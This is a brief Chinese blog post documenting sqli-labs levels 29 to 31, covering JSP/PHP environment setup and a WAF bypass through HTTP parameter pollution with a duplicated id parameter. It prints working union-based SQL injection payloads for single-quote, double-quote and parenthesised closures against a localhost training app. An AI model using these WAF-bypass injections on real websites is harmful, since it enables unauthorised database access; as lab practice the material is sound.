Less29,30,31【jsp环境搭建、WAF】

    less29 需配合waf环境注入,需要jspstudy和phpstudy工具辅助。在phpstudy中apache端口设置成非8080/80,防止和jspstudy的tomcat端口冲突。
另外在jsp文件中需要修改php文件路径
less29测试时,需要在jsp文件后添加id参数
http://localhost:8080/sqli-labs/Less-29/index.jsp?id=1
less29的参数传递共2个
http://localhost:8080/sqli-labs/Less-29/index.jsp?id=1&id=5
至于哪个是PHP参数,哪个是JSP参数需要测试,测试发现第一个参数为JSP(WAF)不可注入,第二个为PHP页面,可以注入。
后续对第二个参数测试,发现是单引号闭合,后续测试与之前一致
http://localhost:8080/sqli-labs/Less-29/index.jsp?id=1&id=-5' union select 1,@@version,3--+
Less30与Less29差别在与闭合符号不同,less30为双引号
http://localhost:8080/sqli-labs/Less-30/index.jsp?id=1&id=-4" union select 1,@@version,3--+
Less31与less30,29差距在闭合符号为(" ")
http://localhost:8080/sqli-labs/Less-31/index.jsp?id=1&id=-3")union select 1,user(),1=("1
 
posted @ 2020-11-05 16:00  峰中追风  阅读(172)  评论(0编辑  收藏  举报

___________________________________________________________________________________________没有白跑的路